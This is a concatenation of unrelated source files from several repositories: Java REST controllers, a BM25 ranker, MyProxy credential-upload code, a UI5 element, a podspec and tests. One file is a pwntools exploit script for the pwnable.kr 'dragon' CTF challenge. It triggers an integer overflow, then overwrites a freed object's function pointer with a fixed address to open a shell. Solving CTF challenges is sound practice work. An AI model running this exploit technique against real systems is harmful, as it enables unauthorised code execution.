# Converts a flat diff hash back into a nested translations hash,
# stripping the locale prefix from each key.
# NOTE(review): gsub! returns nil when the key lacks the locale prefix,
# which would store the value under a nil key — confirm all diff keys
# are prefixed (translations() is called with :prefix => true).
def hasherize( diff, locale = :en )
translator = Vocab::Translator::Rails.new( locale )
diff.each do |key, value|
key = key.to_s.gsub!( /^#{locale.to_s}\./, '' )
translator.store( key, value )
end
return translator.translations( :prefix => true )
end
# Directories shown to the user as examples of where translated files go.
def examples
return [ "#{Vocab.root}/tmp/translations" ]
end
# Fills in the Rails-specific file names before printing the shared
# extraction instructions.
def print_instructions( values = {} )
values[ :diff ] = DIFF
values[ :full ] = FULL
values[ :tree ] = <<-EOS
tmp/translations/es.yml
tmp/translations/zh.yml
EOS
super( values )
end
end
end
end
end
|
ContinuITy-Project/ContinuITy
|
continuity.service.cobra/src/main/java/org/continuity/cobra/controllers/MeasurementDataController.java
|
<reponame>ContinuITy-Project/ContinuITy
package org.continuity.cobra.controllers;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.ROOT;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.GET;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.GET_VERSION;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_ACCESS_LOGS;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_CSV;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_LINK;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_OPEN_XTRACE;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_SESSION_LOGS;
import java.io.IOException;
import java.text.ParseException;
import java.time.LocalDateTime;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.concurrent.TimeoutException;
import org.continuity.api.amqp.AmqpApi;
import org.continuity.api.amqp.ExchangeDefinition;
import org.continuity.api.amqp.RoutingKeyFormatter.AppIdAndVersion;
import org.continuity.api.entities.ApiFormats;
import org.continuity.api.entities.config.MeasurementDataSpec;
import org.continuity.api.rest.RestApi;
import org.continuity.cobra.config.RabbitMqConfig;
import org.continuity.cobra.entities.TraceProcessingStatus;
import org.continuity.cobra.managers.ElasticsearchTraceManager;
import org.continuity.idpa.AppId;
import org.continuity.idpa.VersionOrTimestamp;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.spec.research.open.xtrace.api.core.Trace;
import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.amqp.core.Message;
import org.springframework.amqp.core.MessageProperties;
import org.springframework.amqp.rabbit.core.RabbitAdmin;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.util.ResourceUtils;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.client.RestTemplate;
import com.rabbitmq.client.AMQP.Queue.DeclareOk;
import io.swagger.annotations.ApiImplicitParam;
import io.swagger.annotations.ApiImplicitParams;
import open.xtrace.OPENxtraceUtils;
import springfox.documentation.annotations.ApiIgnore;
/**
 * Controller for storing and retrieving measurement data such as OPEN.xtrace or access logs.
 *
 * <p>Incoming data is not processed here; it is forwarded to a RabbitMQ exchange
 * for asynchronous processing. When {@code TraceProcessingStatus} is inactive
 * (after previous failures), all incoming data is rejected with 409.
 *
 * @author <NAME>
 *
 */
@RestController
@RequestMapping(ROOT)
public class MeasurementDataController {

    private static final Logger LOGGER = LoggerFactory.getLogger(MeasurementDataController.class);

    @Autowired
    private RabbitAdmin rabbitAdmin;

    /** Plain REST template used to download measurement data from user-supplied links. */
    @Autowired
    @Qualifier("plainRestTemplate")
    private RestTemplate plainRestTemplate;

    @Autowired
    private AmqpTemplate amqpTemplate;

    @Autowired
    private ElasticsearchTraceManager manager;

    /** Global processing flag; inactive means new data must be rejected. */
    @Autowired
    private TraceProcessingStatus status;

    /**
     * Retrieves stored traces for an app-id across all versions.
     *
     * @param aid  the app-id
     * @param from optional range start timestamps (must pair with {@code to})
     * @param to   optional range end timestamps (must pair with {@code from})
     * @return the matching traces serialized as JSON
     */
    @RequestMapping(value = GET, method = RequestMethod.GET)
    @ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path") })
    public ResponseEntity<String> getTraces(@ApiIgnore @PathVariable("app-id") AppId aid, @RequestParam(required = false) List<String> from, @RequestParam(required = false) List<String> to)
            throws IOException, TimeoutException {
        return getTracesForVersion(aid, null, from, to);
    }

    /**
     * Retrieves stored traces for an app-id and version, optionally restricted to
     * one or more [from, to] time ranges. {@code from} and {@code to} must either
     * both be absent or have the same length (pairwise ranges).
     */
    @RequestMapping(value = GET_VERSION, method = RequestMethod.GET)
    @ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
            @ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
    public ResponseEntity<String> getTracesForVersion(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
            @RequestParam(required = false) List<String> from, @RequestParam(required = false) List<String> to) throws IOException, TimeoutException {
        if (((from == null) && (to != null)) || ((from != null) && (to == null)) || ((from != null) && (to != null) && (from.size() != to.size()))) {
            return ResponseEntity.badRequest().body("'from' and 'to' need to have same length!");
        }
        List<Trace> traces;
        if ((from == null) && (to == null)) {
            // No ranges: read everything for this app-id/version.
            traces = manager.readTraces(aid, version, null, null);
        } else {
            // Read each [from, to] pair separately and concatenate the results.
            Iterator<String> fromIter = from.iterator();
            Iterator<String> toIter = to.iterator();
            traces = new ArrayList<>();
            while (fromIter.hasNext() && toIter.hasNext()) {
                String f = fromIter.next();
                String t = toIter.next();
                Date dFrom = null;
                try {
                    dFrom = ApiFormats.DATE_FORMAT.parse(f);
                } catch (ParseException e) {
                    LOGGER.error("Cannot parse from date!", e);
                    return ResponseEntity.badRequest().body("Illegal date format of 'from' date: " + f);
                }
                Date dTo = null;
                try {
                    dTo = ApiFormats.DATE_FORMAT.parse(t);
                } catch (ParseException e) {
                    LOGGER.error("Cannot parse to date!", e);
                    return ResponseEntity.badRequest().body("Illegal date format of 'to' date: " + t);
                }
                traces.addAll(manager.readTraces(aid, version, dFrom, dTo));
            }
        }
        String json = OPENxtraceUtils.serializeTraceListToJsonString(traces);
        return ResponseEntity.ok(json);
    }

    /**
     * Accepts a link to measurement data, downloads the data, and dispatches it
     * to the matching push endpoint based on the declared type.
     */
    @RequestMapping(value = PUSH_LINK, method = RequestMethod.POST)
    @ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
            @ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
    public ResponseEntity<Map<String, Object>> pushDataViaLink(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
            @RequestBody MeasurementDataSpec spec,
            @RequestParam(defaultValue = "false") boolean finish)
            throws IOException {
        // BUGFIX: reject links that are NOT well-formed URLs. The previous check
        // was inverted (it rejected exactly the valid URLs), even though the
        // link is fetched via the REST template below and must be a URL.
        if (!ResourceUtils.isUrl(spec.getLink())) {
            return responseError(aid, version, spec.getType().toPrettyString(), HttpStatus.BAD_REQUEST, "Improperly formatted link: " + spec.getLink());
        }
        LOGGER.info("Received link to {} for {}@{}.", spec.getType().toPrettyString(), aid, version);
        switch (spec.getType()) {
        case ACCESS_LOGS:
            String accessLogs = plainRestTemplate.getForObject(spec.getLink(), String.class);
            return pushAccessLogs(aid, version, accessLogs, finish);
        case OPEN_XTRACE:
            String tracesAsJson = plainRestTemplate.getForObject(spec.getLink(), String.class);
            return pushOpenXtraces(aid, version, tracesAsJson, finish);
        case CSV:
            String csvContent = plainRestTemplate.getForObject(spec.getLink(), String.class);
            return pushCsv(aid, version, csvContent, finish);
        case SESSION_LOGS:
            String sessionContent = plainRestTemplate.getForObject(spec.getLink(), String.class);
            return pushSessionLogs(aid, version, sessionContent, finish);
        case INSPECTIT:
        default:
            return responseError(aid, version, spec.getType().toPrettyString(), HttpStatus.BAD_REQUEST, "Unsupported measurement data type: " + spec.getType().toPrettyString());
        }
    }

    /** Accepts OPEN.xtrace data (JSON body) and forwards it for processing. */
    @RequestMapping(value = PUSH_OPEN_XTRACE, method = RequestMethod.POST)
    @ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
            @ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
    public ResponseEntity<Map<String, Object>> pushOpenXtraces(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
            @RequestBody String tracesAsJson,
            @RequestParam(defaultValue = "false") boolean finish)
            throws IOException {
        if (!status.isActive()) {
            LOGGER.warn("Rejecting OPEN.xtraces for {}@{} due to previous failures.", aid, version);
            return responseRejected(aid, version, "open-xtrace");
        }
        LOGGER.info("Received OPEN.xtraces for {}@{}.", aid, version);
        return forwardData("open-xtrace", aid, version, tracesAsJson, finish);
    }

    /** Accepts access logs (plain text body) and forwards them for processing. */
    @RequestMapping(value = PUSH_ACCESS_LOGS, method = RequestMethod.POST)
    @ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
            @ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
    public ResponseEntity<Map<String, Object>> pushAccessLogs(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
            @RequestBody String accessLogs,
            @RequestParam(defaultValue = "false") boolean finish)
            throws IOException {
        if (!status.isActive()) {
            LOGGER.warn("Rejecting access logs for {}@{} due to previous failures.", aid, version);
            return responseRejected(aid, version, "access-logs");
        }
        LOGGER.info("Received access logs for {}@{}.", aid, version);
        return forwardData("access-logs", aid, version, accessLogs, finish);
    }

    /** Accepts CSV data (plain text body) and forwards it for processing. */
    @RequestMapping(value = PUSH_CSV, method = RequestMethod.POST)
    @ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
            @ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
    public ResponseEntity<Map<String, Object>> pushCsv(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version, @RequestBody String csvContent,
            @RequestParam(defaultValue = "false") boolean finish)
            throws IOException {
        if (!status.isActive()) {
            LOGGER.warn("Rejecting CSV for {}@{} due to previous failures.", aid, version);
            return responseRejected(aid, version, "csv");
        }
        LOGGER.info("Received CSV for {}@{}.", aid, version);
        return forwardData("csv", aid, version, csvContent, finish);
    }

    /** Accepts session logs (plain text body) and forwards them for processing. */
    @RequestMapping(value = PUSH_SESSION_LOGS, method = RequestMethod.POST)
    @ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
            @ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
    public ResponseEntity<Map<String, Object>> pushSessionLogs(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
            @RequestBody String sessionContent,
            @RequestParam(defaultValue = "false") boolean finish) throws IOException {
        if (!status.isActive()) {
            LOGGER.warn("Rejecting session logs for {}@{} due to previous failures.", aid, version);
            return responseRejected(aid, version, "session-logs");
        }
        LOGGER.info("Received session logs for {}@{}.", aid, version);
        return forwardData("session-logs", aid, version, sessionContent, finish);
    }

    /**
     * Publishes the raw data to the trace-processing exchange with datatype and
     * finish flags in the message headers, then returns 202 Accepted.
     */
    private ResponseEntity<Map<String, Object>> forwardData(String datatype, AppId aid, VersionOrTimestamp version, String data, boolean finish) {
        MessageProperties props = new MessageProperties();
        props.setHeader(AmqpApi.Cobra.HEADER_DATATYPE, datatype);
        props.setHeader(AmqpApi.Cobra.HEADER_FINISH, finish);
        props.setContentEncoding(AmqpApi.Cobra.CONTENT_CHARSET.name());
        // Only OPEN.xtrace payloads are JSON; everything else is plain text.
        if ("open-xtrace".equals(datatype)) {
            props.setContentType("application/json");
        } else {
            props.setContentType("text/plain");
        }
        ExchangeDefinition<AppIdAndVersion> exchange = AmqpApi.Cobra.TASK_PROCESS_TRACES;
        Message message = new Message(data.getBytes(AmqpApi.Cobra.CONTENT_CHARSET), props);
        amqpTemplate.send(exchange.name(), exchange.formatRoutingKey().of(aid, version), message);
        LOGGER.info("{}@{} Forwarded data to {}.", aid, version, exchange.name());
        return responseAccepted(aid, version, datatype);
    }

    /** Builds the 202 Accepted response, including a link to retrieve the data. */
    private ResponseEntity<Map<String, Object>> responseAccepted(AppId aid, VersionOrTimestamp version, String datatype) {
        Map<String, Object> response = responseBase(aid, version, datatype);
        response.put("status", HttpStatus.ACCEPTED.value());
        response.put("message", "The data has been accepted for processing");
        response.put("link", RestApi.Cobra.MeasurementData.GET_VERSION.requestUrl(aid, version).withoutProtocol().get());
        return ResponseEntity.accepted().body(response);
    }

    /** Builds the 409 Conflict response used when processing is stopped. */
    private ResponseEntity<Map<String, Object>> responseRejected(AppId aid, VersionOrTimestamp version, String datatype) {
        return responseError(aid, version, datatype, HttpStatus.CONFLICT, "Trace processing is stopped due to previous failures");
    }

    /** Builds an error response with the given status and message. */
    private ResponseEntity<Map<String, Object>> responseError(AppId aid, VersionOrTimestamp version, String datatype, HttpStatus status, String message) {
        Map<String, Object> response = responseBase(aid, version, datatype);
        response.put("status", status.value());
        response.put("error", status.getReasonPhrase());
        response.put("message", message);
        return ResponseEntity.status(status).body(response);
    }

    /** Common response fields shared by accepted and error responses. */
    private Map<String, Object> responseBase(AppId aid, VersionOrTimestamp version, String datatype) {
        Map<String, Object> response = new HashMap<>();
        response.put("timestamp", LocalDateTime.now());
        response.put("app-id", aid);
        response.put("version", version);
        response.put("type", datatype);
        response.put("num-queued", getQueuedMessages(aid));
        return response;
    }

    /**
     * Returns the current depth of the trace-processing queue.
     * NOTE(review): RabbitTemplate.execute may return null if the channel
     * callback fails — confirm the surrounding error handling is acceptable.
     */
    private int getQueuedMessages(AppId aid) {
        DeclareOk declareOk = rabbitAdmin.getRabbitTemplate().execute(channel -> channel.queueDeclarePassive(RabbitMqConfig.TASK_PROCESS_TRACES_QUEUE_NAME));
        return declareOk.getMessageCount();
    }
}
|
saq7/MeTA
|
src/index/ranker/okapi_bm25.cpp
|
/**
* @file okapi_bm25.cpp
* @author <NAME>
*/
#include <cmath>
#include "index/inverted_index.h"
#include "index/ranker/okapi_bm25.h"
#include "index/score_data.h"
namespace meta
{
namespace index
{
// Identifier under which this ranker is registered in configuration files.
const std::string okapi_bm25::id = "bm25";
/**
 * @param k1 term-frequency saturation parameter
 * @param b  document-length normalization parameter
 * @param k3 query term-frequency saturation parameter
 */
okapi_bm25::okapi_bm25(double k1, double b, double k3) : k1_{k1}, b_{b}, k3_{k3}
{
/* nothing */
}
/**
 * Scores a single (document, term) pair with Okapi BM25:
 * IDF = log(1 + (N - df + 0.5) / (df + 0.5)), multiplied by a
 * length-normalized term-frequency factor (k1, b) and a query
 * term-frequency saturation factor (k3).
 */
double okapi_bm25::score_one(const score_data& sd)
{
double doc_len = sd.idx.doc_size(sd.d_id);
// add 1.0 to the IDF to ensure that the result is positive
double IDF = std::log(
1.0 + (sd.num_docs - sd.doc_count + 0.5) / (sd.doc_count + 0.5));
// Term frequency with document-length normalization.
double TF = ((k1_ + 1.0) * sd.doc_term_count)
/ ((k1_ * ((1.0 - b_) + b_ * doc_len / sd.avg_dl))
+ sd.doc_term_count);
// Query term-frequency saturation.
double QTF = ((k3_ + 1.0) * sd.query_term_count)
/ (k3_ + sd.query_term_count);
return TF * IDF * QTF;
}
/**
 * Factory specialization: builds an okapi_bm25 ranker from a config table,
 * reading the optional "k1", "b", and "k3" keys and falling back to the
 * class defaults when a key is absent.
 */
template <>
std::unique_ptr<ranker> make_ranker<okapi_bm25>(const cpptoml::table& config)
{
auto k1 = okapi_bm25::default_k1;
if (auto c_k1 = config.get_as<double>("k1"))
k1 = *c_k1;
auto b = okapi_bm25::default_b;
if (auto c_b = config.get_as<double>("b"))
b = *c_b;
auto k3 = okapi_bm25::default_k3;
if (auto c_k3 = config.get_as<double>("k3"))
k3 = *c_k3;
return make_unique<okapi_bm25>(k1, b, k3);
}
}
}
|
ttomttom/aarc-master-portal
|
master-portal/master-portal-client/src/main/java/eu/rcauth/masterportal/client/MPOA2MPService.java
|
package eu.rcauth.masterportal.client;
import java.security.GeneralSecurityException;
import java.security.cert.X509Certificate;
import java.util.Map;
import edu.uiuc.ncsa.myproxy.MPConnectionProvider;
import edu.uiuc.ncsa.myproxy.MyProxyConnectable;
import edu.uiuc.ncsa.myproxy.oa4mp.client.Asset;
import edu.uiuc.ncsa.myproxy.oa4mp.client.AssetResponse;
import edu.uiuc.ncsa.myproxy.oa4mp.client.ClientEnvironment;
import edu.uiuc.ncsa.myproxy.oa4mp.client.OA4MPServiceProvider;
import edu.uiuc.ncsa.oa4mp.oauth2.client.OA2Asset;
import edu.uiuc.ncsa.oa4mp.oauth2.client.OA2MPService;
import edu.uiuc.ncsa.security.core.Identifier;
import edu.uiuc.ncsa.security.core.exceptions.GeneralException;
import edu.uiuc.ncsa.security.core.util.MyLoggingFacade;
import edu.uiuc.ncsa.security.oauth_2_0.OA2Constants;
import edu.uiuc.ncsa.security.oauth_2_0.client.ATResponse2;
import edu.uiuc.ncsa.security.util.pkcs.ProxyUtil;
import eu.emi.security.authn.x509.impl.OpensslNameUtils;
import eu.emi.security.authn.x509.proxy.ProxyUtils;
public class MPOA2MPService extends OA2MPService {
/* SERVICE LOADER */
/** Service-loader provider that creates {@link MPOA2MPService} instances. */
public static class MPOA2MPProvider extends OA4MPServiceProvider {
public MPOA2MPProvider(ClientEnvironment clientEnvironment) {
super(clientEnvironment);
}
@Override
public MPOA2MPService get() {
return new MPOA2MPService(clientEnvironment);
}
}
/* CONSTRUCTOR */
protected MyLoggingFacade logger = null;
/**
 * Creates the service for the given client environment, taking the logger
 * from it. When no environment is available a standalone logger is created
 * so failures can still be recorded.
 */
public MPOA2MPService(ClientEnvironment environment) {
super(environment);
if (getEnvironment() != null) {
logger = getEnvironment().getMyLogger();
} else {
// always return one so even if things blow up some record
// remains...
logger = new MyLoggingFacade("NOENV-MasterPortal");
}
}
/* OVERRIDDEN METHODS */
/**
* Extended /getcert request. This executes the regular /getcert request (just as
* the normal OA4MP Client would) but instead of passing the resulting credential,
* instead it stores it in the form of a long lived proxy certificate.
* <p>
* This method accounts for checking whether the retrieved credential is an
* EEC or a Proxy. In case of an EEC a proxy is created via the MyProxy PUT command.
* In case of the Proxy the MyProxy STORE command is used instead.
*
*/
@Override
public AssetResponse getCert(OA2Asset a, ATResponse2 atResponse2) {
AssetResponse par = super.getCert(a, atResponse2);
logger.info("3.b Certificate request ended, trying to store the received cert in the Credential Store");
try {
// upload certificate to Credential Store
uploadCert(par, a);
// NOTE: cannot properly destroy the privateKey object: .destroy()
// method is not implemented (it's an RSAPrivateCrtKeyImpl), and the
// .getEncoded() method returns a byte[] copy. So set to null and
// wait for the garbage collector.
a.setPrivateKey(null);
return par;
} catch (Throwable e) {
if (e instanceof GeneralException) {
throw (GeneralException) e;
} else {
throw new GeneralException(e);
}
}
}
/**
* This extended method makes sure that the SCOPE parameter
* provided in the parameter map is not getting overwritten
* by any subsequent pre-processing.
* <p>
* This method will only have effect if the provided parameter
* map has its SCOPE parameter set before this method is called.
* <p>
* The SCOPE parameter is being forwarded from the MP Server,
* and it needs to be preserved by the MP Client.
*
* @param asset The current session asset
* @param parameters The parameter map that will end up in the authorize request
*/
@Override
@SuppressWarnings("unchecked")
public void preRequestCert(Asset asset, Map parameters) {
String originalScopes = null;
if ( parameters.get(OA2Constants.SCOPE) != null ) {
// save original SCOPE parameter
originalScopes = (String) parameters.get(OA2Constants.SCOPE);
}
// call super method. this might overwrite the SCOPE parameter
super.preRequestCert(asset, parameters);
if (originalScopes != null && ! originalScopes.isEmpty()) {
// make sure the original SCOPE parameter is set
parameters.put(OA2Constants.SCOPE, originalScopes);
}
}
/* MYPROXY COMMANDS */
/**
* Upload the certificate chain from the AssetResponse and its matching key from
* the OA2Asset into the MyProxy Credential Store.
* <p>
* Use MyProxy PUT command to store a Long Lived Proxy certificate made from the
* EEC found in the assetResp. Call this in case /getcert returns an EEC.
* <p>
* Use MyProxy STORE command to store the Proxy certificate found in the assetResp.
* Call this in case /getcert returns a Proxy.
*
* @param assetResp The asset response of a /getcert request
* @param asset The asset created to identify the ongoing session
* @throws Throwable MyProxy related exceptions
*/
public void uploadCert(AssetResponse assetResp, OA2Asset asset) throws Throwable {
String myproxyPassword = ((MPOA2ClientEnvironment)getEnvironment()).getMyproxyPassword();
long lifetime = getEnvironment().getCertLifetime();
MyProxyConnectable mp = createMPConnection(asset.getIdentifier(), asset.getUsername(), myproxyPassword, lifetime);
mp.setLifetime(lifetime * 1000);
// Get the end entity certificate DN in openssl format. The openssl format is
// necessary because that's what MyProxy Server expects.
X509Certificate eec = ProxyUtils.getEndUserCertificate( assetResp.getX509Certificates() );
String rfcDN = eec.getSubjectDN().getName();
String opensslDN = OpensslNameUtils.convertFromRfc2253( rfcDN , false);
// This enables users with an existing valid proxy to renew their proxy
mp.setRenewer(opensslDN);
// see if the result is a proxy or an EEC
if ( ProxyUtil.isProxy(assetResp.getX509Certificates()) ) {
logger.info("3.b Using MyProxy STORE to store credential");
// Proxy Certificate use STORE
mp.doStore( assetResp.getX509Certificates() , asset.getPrivateKey());
} else {
logger.info("3.b Using MyProxy PUT to store credential");
// User EE Certificate use PUT
mp.doPut( assetResp.getX509Certificates() , asset.getPrivateKey());
}
}
/* HELPER METHODS */
/**
* Create a connection to a MyProxy Server. This method uses the MyProxy Server
* connection configuration, and is written after the MyProxy Connection model
* in the OA4MP Server component.
*
* @param identifier The asset(session) identifier to identify the connection by
* @param userName The username used in the MyProxy connection
* @param password The password used in the MyProxy connection
* @param lifetime The lifetime used in the MyProxy connection
* @return The established MyProxy connection
* @throws GeneralSecurityException In case a connection could not be established.
*/
protected MyProxyConnectable createMPConnection(Identifier identifier, String userName, String password,
long lifetime) throws GeneralSecurityException {
MPOA2ClientEnvironment env = (MPOA2ClientEnvironment)getEnvironment();
MPConnectionProvider<MyProxyConnectable> facades = new MPConnectionProvider<>(logger, env.getMyProxyServices() );
// use null for the LOA since we are not supporting any at the moment
return facades.findConnection(identifier, userName, password, null, lifetime);
}
}
|
IdanBanani/Pwnable.kr-CTF-Writeups
|
pwnable.kr/Rookiss/dragon/solve.py
|
<gh_stars>0
#!/usr/bin/env python2
# Exploit for pwnable.kr "dragon" (Rookiss, port 9004). Python 2 + pwntools.
from pwn import *

# Toggle between the remote challenge service and a local copy of the binary.
ready = True
if ready:
    conn = remote('pwnable.kr', 9004)
else:
    conn = process(['/home/doublesine/Desktop/dragon'])

def SendLine(s):
    # Send one line, echo it locally, and pause briefly so the remote
    # service finishes processing before the next read.
    conn.sendline(s)
    print(s)
    sleep(0.5)

# First round will get a failure.
# But don't worry, we will win in the next round.
def FirstRound():
    print conn.read(),
    SendLine('1')
    print conn.read(),
    SendLine('1')

# Win by char overflow: repeated moves wrap the dragon's 8-bit counter.
def SecondRound():
    print conn.read(),
    for i in range(4):
        SendLine('3')
    print conn.read(),
    SendLine('3')
    print conn.read(),
    SendLine('2')
    print conn.read(),

# presumably the address of the hidden shell-spawning function that the
# freed object's function pointer gets overwritten with -- TODO confirm
target_addr = pack(0x08048DBF, 32)
print conn.read(),
SendLine('1') # we choose priest
FirstRound()
print conn.read(),
SendLine('1')
SecondRound()
# send payload and you will get shell
# (the trailing string after the address is arbitrary filler)
SendLine(target_addr + 'fuck')
conn.interactive()
|
keremkoseoglu/Kifu
|
web/static/openui5/sap/ui/mdc/link/SemanticObjectMapping-dbg.js
|
<reponame>keremkoseoglu/Kifu
/*
 * ! OpenUI5
 * (c) Copyright 2009-2020 SAP SE or an SAP affiliate company.
 * Licensed under the Apache License, Version 2.0 - see LICENSE.txt.
 */
sap.ui.define([
    'sap/ui/core/Element'
], function(Element) {
    "use strict";
    /**
     * Constructor for a new SemanticObjectMapping.
     *
     * Holds a semantic-object name together with a list of mapping items
     * (see the "items" aggregation below).
     *
     * @param {string} [sId] ID for the new control, generated automatically if no ID is given
     * @param {object} [mSettings] initial settings for the new control
     * @class Type for...
     * @extends sap.ui.core.Element
     * @version 1.84.9
     * @constructor
     * @private
     * @since 1.58.0
     * @alias sap.ui.mdc.link.SemanticObjectMapping
     * @ui5-metamodel This control/element also will be described in the UI5 (legacy) designtime metamodel
     */
    var SemanticObjectMapping = Element.extend("sap.ui.mdc.link.SemanticObjectMapping", /** @lends sap.ui.mdc.link.SemanticObjectMapping.prototype */
    {
        metadata: {
            library: "sap.ui.mdc",
            properties: {
                // Name of the semantic object this mapping applies to.
                semanticObject: {
                    type: "string"
                }
            },
            defaultAggregation: "items",
            aggregations: {
                // The individual key/value mapping entries.
                items: {
                    type: "sap.ui.mdc.link.SemanticObjectMappingItem",
                    multiple: true,
                    singularName: "item"
                }
            }
        }
    });
    return SemanticObjectMapping;
});
|
Jawbone/Specs
|
PBJVideoPlayer/0.1.4/PBJVideoPlayer.podspec
|
<gh_stars>1-10
# CocoaPods specification for PBJVideoPlayer v0.1.4 (iOS touch-to-play video player).
Pod::Spec.new do |s|
  s.name = "PBJVideoPlayer"
  s.version = "0.1.4"
  s.summary = "iOS video player, simple drop in component featuring touch-to-play"
  s.homepage = "https://github.com/piemonte/PBJVideoPlayer"
  s.license = "MIT"
  s.authors = { "<NAME>" => "<EMAIL>" }
  s.source = { :git => "https://github.com/piemonte/PBJVideoPlayer.git", :tag => "v0.1.4" }
  s.frameworks = 'Foundation', 'AVFoundation', 'CoreGraphics', 'QuartzCore', 'UIKit'
  s.platform = :ios, '6.0'
  s.source_files = 'Source'
  s.requires_arc = true
end
|
HubSpot/Baragon
|
BaragonData/src/test/java/com/hubspot/baragon/auth/BaragonAuthFilterTest.java
|
package com.hubspot.baragon.auth;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import com.google.inject.Inject;
import name.falgout.jeffrey.testing.junit.guice.GuiceExtension;
import name.falgout.jeffrey.testing.junit.guice.IncludeModule;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
/**
 * Guice wiring smoke tests: verify that the auth filter and auth feature can be
 * instantiated from the bindings supplied by {@code AuthFilterTestModule}.
 */
@ExtendWith(GuiceExtension.class)
@IncludeModule(AuthFilterTestModule.class)
public class BaragonAuthFilterTest {

    /** The injector must be able to construct a {@link BaragonAuthFilter}. */
    @Test
    @Inject
    public void itCanBuildBaragonAuthFilter(BaragonAuthFilter baragonAuthFilter) {
        assertNotNull(baragonAuthFilter);
    }

    /** The injector must be able to construct a {@code BaragonAuthFeature}. */
    @Test
    @Inject
    public void itCanBuildBaragonAuthFeatureInstances(
        BaragonAuthFeature baragonAuthFeature
    ) {
        assertNotNull(baragonAuthFeature);
    }
}
|
Terry-Lee-Git/weirblog-quarkus
|
quarkus-narayana-lra-demo/narayana-lra-client2/src/main/java/org/acme/client/TicketService.java
|
package org.acme.client;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.rest.client.inject.RegisterRestClient;
/**
 * MicroProfile REST client interface for the remote ticket-booking service,
 * used within the Narayana LRA demo.
 */
@Path("/client")
@Produces(MediaType.APPLICATION_JSON)
@RegisterRestClient
public interface TicketService {

    /** Performs GET /client/book and returns the raw JSON response body. */
    @GET
    @Path("/book")
    String bookTicket();
}
|
dsqdata/jl-admin-server
|
rtadmin-docs/src/main/java/com/ratel/modules/updata/rest/YqpcController.java
|
package com.ratel.modules.updata.rest;
import com.ratel.config.DataScope;
import com.ratel.framework.exception.BadRequestException;
import com.ratel.modules.docs.domain.ModDocs;
import com.ratel.modules.logging.aop.log.Log;
import com.ratel.modules.updata.domain.YqpcMain;
import com.ratel.modules.updata.service.ModYqpcMainService;
import com.ratel.modules.updata.service.dto.YqpcQueryCriteria;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiOperation;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.data.domain.PageRequest;
import org.springframework.data.domain.Pageable;
import org.springframework.data.domain.Sort;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.security.access.prepost.PreAuthorize;
import org.springframework.validation.annotation.Validated;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
@RestController
@RequestMapping("/api/modYqpc")
@Api(tags = "文档:疫情排查")
public class YqpcController {

    @Autowired
    private ModYqpcMainService modYqpcMainService;

    @Autowired
    private DataScope dataScope;

    private static final String ENTITY_NAME = "modYqpc";

    /**
     * Exports document data matching the criteria, restricted to the
     * departments the current user may access.
     */
    @Log("导出文档数据")
    @ApiOperation("导出文档数据")
    @GetMapping(value = "/download")
    @PreAuthorize("@el.check('pcdj:list')")
    public void download(HttpServletResponse response, YqpcQueryCriteria criteria) throws IOException {
        // Data-scope restriction: limit the export to the caller's departments.
        criteria.setSystemDeptIds(dataScope.getDeptIds());
        modYqpcMainService.download(modYqpcMainService.queryAll(criteria), response);
